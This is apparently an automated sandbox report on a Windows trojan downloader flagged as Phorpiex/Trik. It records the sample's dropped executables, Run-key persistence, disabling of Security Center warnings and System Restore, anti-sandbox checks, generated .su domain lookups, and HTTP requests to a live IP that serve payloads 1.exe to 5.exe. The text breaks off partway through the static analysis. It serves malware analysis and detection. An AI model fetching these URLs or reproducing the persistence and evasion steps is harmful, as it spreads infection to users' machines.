- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_606ac88c.1"
- [*] File Size: 253440
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "f06bc76647c37e85b60aec384eba21a56a3dc2ddb0b962536b05f1b827fee8b1"
- [*] MD5: "230ad5935436cf709dc1e06a6229c3b3"
- [*] SHA1: "0c4a87cbdd0cb833e574d7ddec41b59b83b3d554"
- [*] SHA512: "5d5ba9ad69f093475fddb2cefe365d86267d8eacb402e0ac3e6180cf96722f6a5938caa9fec79064ddce452b01838b730ea2b65d23f10e2209d6f26c92a3775e"
- [*] CRC32: "606AC88C"
- [*] SSDEEP: "6144:vR40u42cHaIKQ0xNuaDD4b7OeHMDzCTf:vRs5c6JxNuoTCT"
- [*] Process Execution: [
- "Exes_606ac88c.1",
- "winnjdu.exe",
- "1103737371.exe",
- "3251136198.exe",
- "wingzfw.exe",
- "2451410298.exe",
- "2940639086.exe",
- "4227421410.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details": []
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\4227421410.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe"
- },
- {
- "binary": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe"
- },
- {
- "binary": "C:\\Windows\\3007640516827661\\wingzfw.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/1.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/2.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/3.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/4.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/5.exe"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "url": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "url": "http://193.32.161.77/1.exe"
- },
- {
- "url": "http://193.32.161.77/2.exe"
- },
- {
- "url": "http://193.32.161.77/3.exe"
- },
- {
- "url": "http://193.32.161.77/4.exe"
- },
- {
- "url": "http://193.32.161.77/5.exe"
- }
- ]
- },
- {
- "Description": "Detects Sandboxie through the presence of a library",
- "Details": []
- },
- {
- "Description": "Detects SunBelt Sandbox through the presence of a library",
- "Details": []
- },
- {
- "Description": "Attempts to remove evidence of file being downloaded from the Internet",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe:Zone.Identifier"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "3251136198.exe (1720) called API GlobalMemoryStatus 2165386 times"
- },
- {
- "Spam": "4227421410.exe (2972) called API GlobalMemoryStatus 574213 times"
- },
- {
- "Spam": "wingzfw.exe (596) called API GlobalMemoryStatus 2165386 times"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Windows\\2018222015062149"
- },
- {
- "file": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
- }
- ]
- },
- {
- "Description": "File has been identified by 43 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "MicroWorld-eScan": "Trojan.GenericKD.32053517"
- },
- {
- "FireEye": "Generic.mg.230ad5935436cf70"
- },
- {
- "McAfee": "Trojan-FQYR!230AD5935436"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "AegisLab": "Trojan.Win32.Trik.4!c"
- },
- {
- "Alibaba": "TrojanDownloader:Win32/Trik.46992fc6"
- },
- {
- "K7GW": "Riskware ( 0040eff71 )"
- },
- {
- "Symantec": "Trojan.Gen.2"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "Trojan-Downloader.Win32.Trik.fo"
- },
- {
- "BitDefender": "Trojan.GenericKD.32053517"
- },
- {
- "Avast": "Win32:CrypterX-gen [Trj]"
- },
- {
- "Rising": "Worm.Phorpiex!8.48D (CLOUD)"
- },
- {
- "Endgame": "malicious (moderate confidence)"
- },
- {
- "Sophos": "Mal/Generic-S"
- },
- {
- "Comodo": "Malware@#4velj06b5762"
- },
- {
- "F-Secure": "Trojan.TR/AD.Phorpiex.uirrr"
- },
- {
- "TrendMicro": "TROJ_GEN.R011C0GFD19"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.MultiPlug.dh"
- },
- {
- "Trapmine": "malicious.high.ml.score"
- },
- {
- "Emsisoft": "Trojan.GenericKD.32053517 (B)"
- },
- {
- "SentinelOne": "DFI - Suspicious PE"
- },
- {
- "Cyren": "W32/Trojan.MOZI-2355"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GTXN"
- },
- {
- "Webroot": "W32.Trojan.Gen"
- },
- {
- "Avira": "TR/AD.Phorpiex.uirrr"
- },
- {
- "Fortinet": "W32/Kryptik.GTVG!tr"
- },
- {
- "Microsoft": "Worm:Win32/Phorpiex.AF!bit"
- },
- {
- "Arcabit": "Trojan.Generic.D1E9190D"
- },
- {
- "ZoneAlarm": "Trojan-Downloader.Win32.Trik.fo"
- },
- {
- "GData": "Trojan.GenericKD.32053517"
- },
- {
- "AhnLab-V3": "Malware/Win32.Generic.C3288358"
- },
- {
- "Acronis": "suspicious"
- },
- {
- "ALYac": "Trojan.GenericKD.32053517"
- },
- {
- "VBA32": "BScope.Trojan.AET.281105"
- },
- {
- "Malwarebytes": "Trojan.MalPack.GS"
- },
- {
- "TrendMicro-HouseCall": "TROJ_GEN.R011C0GFD19"
- },
- {
- "Ikarus": "Trojan.Win32.Krypt"
- },
- {
- "Ad-Aware": "Trojan.GenericKD.32053517"
- },
- {
- "AVG": "Win32:CrypterX-gen [Trj]"
- },
- {
- "Panda": "Trj/GdSda.A"
- },
- {
- "CrowdStrike": "win/malicious_confidence_70% (W)"
- }
- ]
- },
- {
- "Description": "Operates on local firewall's policies and settings",
- "Details": []
- },
- {
- "Description": "Creates a copy of itself",
- "Details": [
- {
- "copy": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- },
- {
- "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe"
- }
- ]
- },
- {
- "Description": "Attempts to disable System Restore",
- "Details": []
- },
- {
- "Description": "Attempts to modify or disable Security Center warnings",
- "Details": []
- },
- {
- "Description": "Likely use of Domain Generation Algorithm (DGA)",
- "Details": []
- },
- {
- "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_606ac88c.1:Zone.Iduentifier"
- },
- {
- "file": "C:\\Windows\\2018222015062149\\winnjdu.exe:Zone.Iduentifier"
- }
- ]
- },
- {
- "Description": "Anomalous binary characteristics",
- "Details": [
- {
- "anomaly": "Found duplicated section names"
- }
- ]
- },
- {
- "Description": "Created network traffic indicative of malicious activity",
- "Details": [
- {
- "signature": "ET DROP Dshield Block Listed Source group 1"
- },
- {
- "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
- },
- {
- "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
- }
- ]
- }
- ]
- [*] Started Service: []
- [*] Executed Commands: [
- "C:\\Windows\\2018222015062149\\winnjdu.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe"
- ]
- [*] Mutexes: [
- "976857468"
- ]
- [*] Modified Files: [
- "C:\\Windows\\2018222015062149\\winnjdu.exe",
- "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\4227421410.exe"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_606ac88c.1:Zone.Iduentifier",
- "C:\\Windows\\2018222015062149\\winnjdu.exe:Zone.Iduentifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe:Zone.Identifier"
- ]
- [*] Modified Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
- ]
- [*] Deleted Registry Keys: []
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "aiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "abaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "MX",
- "request": "yahoo.com",
- "answers": [
- {
- "data": "mta5.am0.yahoodns.net",
- "type": "MX"
- },
- {
- "data": "mta7.am0.yahoodns.net",
- "type": "MX"
- },
- {
- "data": "mta6.am0.yahoodns.net",
- "type": "MX"
- }
- ]
- },
- {
- "type": "A",
- "request": "mta6.am0.yahoodns.net",
- "answers": [
- {
- "data": "67.195.228.94",
- "type": "A"
- },
- {
- "data": "66.218.85.139",
- "type": "A"
- },
- {
- "data": "74.6.137.64",
- "type": "A"
- },
- {
- "data": "98.137.159.27",
- "type": "A"
- },
- {
- "data": "98.137.159.26",
- "type": "A"
- },
- {
- "data": "98.137.159.25",
- "type": "A"
- },
- {
- "data": "66.218.85.52",
- "type": "A"
- },
- {
- "data": "67.195.228.110",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "92.242.140.2",
- "domain": "xiaeufaehe.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tiaeufaehe.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aieieieros.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "teuaueudgs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aniaeninie.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "weubeufubg.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wbaeubuegs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wieieieros.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wiaeufaehe.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wiheiufisd.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "teoghehofu.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aeoghehofu.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wniaeninie.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aiheiufisd.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xiheiufisd.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tniaeninie.su"
- },
- {
- "ip": "74.6.137.64",
- "domain": "mta6.am0.yahoodns.net"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xieieieros.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tbaeubuegs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aiaeufaehe.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "weoghehofu.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xeoghehofu.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "abaeubuegs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xbaeubuegs.su"
- },
- {
- "ip": "72.30.35.10",
- "domain": "yahoo.com"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tieieieros.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aeubeufubg.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aeuaueudgs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "teubeufubg.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xniaeninie.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tiheiufisd.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "weuaueudgs.su"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?new=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?new=1",
- "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?on=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?on=1",
- "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/1.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/1.exe",
- "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/2.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/2.exe",
- "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/3.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/3.exe",
- "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/4.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/4.exe",
- "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/5.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/5.exe",
- "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "ExitProcess",
- "address": "0x426000"
- },
- {
- "name": "DebugActiveProcessStop",
- "address": "0x426004"
- },
- {
- "name": "lstrcpynA",
- "address": "0x426008"
- },
- {
- "name": "UnlockFile",
- "address": "0x42600c"
- },
- {
- "name": "GetFileAttributesExA",
- "address": "0x426010"
- },
- {
- "name": "GetTickCount",
- "address": "0x426014"
- },
- {
- "name": "GetNumberFormatA",
- "address": "0x426018"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x42601c"
- },
- {
- "name": "LoadLibraryW",
- "address": "0x426020"
- },
- {
- "name": "GetConsoleAliasExesLengthW",
- "address": "0x426024"
- },
- {
- "name": "GetBinaryTypeA",
- "address": "0x426028"
- },
- {
- "name": "lstrlenW",
- "address": "0x42602c"
- },
- {
- "name": "Module32First",
- "address": "0x426030"
- },
- {
- "name": "GetLastError",
- "address": "0x426034"
- },
- {
- "name": "GetProcAddress",
- "address": "0x426038"
- },
- {
- "name": "PeekConsoleInputW",
- "address": "0x42603c"
- },
- {
- "name": "WTSGetActiveConsoleSessionId",
- "address": "0x426040"
- },
- {
- "name": "VirtualProtect",
- "address": "0x426044"
- },
- {
- "name": "CreateToolhelp32Snapshot",
- "address": "0x426048"
- },
- {
- "name": "GetCPInfoExA",
- "address": "0x42604c"
- },
- {
- "name": "CloseHandle",
- "address": "0x426050"
- },
- {
- "name": "EncodePointer",
- "address": "0x426054"
- },
- {
- "name": "DecodePointer",
- "address": "0x426058"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x42605c"
- },
- {
- "name": "RaiseException",
- "address": "0x426060"
- },
- {
- "name": "RtlUnwind",
- "address": "0x426064"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x426068"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42606c"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x426070"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x426074"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x426078"
- },
- {
- "name": "WriteFile",
- "address": "0x42607c"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x426080"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x426084"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x426088"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42608c"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x426090"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x426094"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x426098"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42609c"
- },
- {
- "name": "HeapSize",
- "address": "0x4260a0"
- },
- {
- "name": "HeapFree",
- "address": "0x4260a4"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4260a8"
- },
- {
- "name": "SetLastError",
- "address": "0x4260ac"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x4260b0"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x4260b4"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x4260b8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x4260bc"
- },
- {
- "name": "GetFileType",
- "address": "0x4260c0"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x4260c4"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x4260c8"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x4260cc"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x4260d0"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4260d4"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x4260d8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x4260dc"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x4260e0"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x4260e4"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x4260e8"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x4260ec"
- },
- {
- "name": "CreateEventW",
- "address": "0x4260f0"
- },
- {
- "name": "Sleep",
- "address": "0x4260f4"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x4260f8"
- },
- {
- "name": "TerminateProcess",
- "address": "0x4260fc"
- },
- {
- "name": "TlsAlloc",
- "address": "0x426100"
- },
- {
- "name": "TlsGetValue",
- "address": "0x426104"
- },
- {
- "name": "TlsSetValue",
- "address": "0x426108"
- },
- {
- "name": "TlsFree",
- "address": "0x42610c"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x426110"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x426114"
- },
- {
- "name": "SetStdHandle",
- "address": "0x426118"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42611c"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x426120"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x426124"
- },
- {
- "name": "FreeLibrary",
- "address": "0x426128"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42612c"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x426130"
- },
- {
- "name": "GetACP",
- "address": "0x426134"
- },
- {
- "name": "GetOEMCP",
- "address": "0x426138"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42613c"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x426140"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x426144"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x426148"
- },
- {
- "name": "CompareStringW",
- "address": "0x42614c"
- },
- {
- "name": "LCMapStringW",
- "address": "0x426150"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x426154"
- },
- {
- "name": "IsValidLocale",
- "address": "0x426158"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42615c"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x426160"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x426164"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x426168"
- },
- {
- "name": "CreateFileW",
- "address": "0x42616c"
- }
- ],
- "dll": "KERNEL32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": "hozatejiz.exe",
- "actual_checksum": "0x00044ae0",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00044ae0",
- "icon_hash": null,
- "entrypoint": "0x00403a61",
- "timestamp": "2018-06-17 04:22:09",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00025000",
- "entropy": "6.72",
- "raw_address": "0x00000400",
- "virtual_size": "0x00024ebd",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
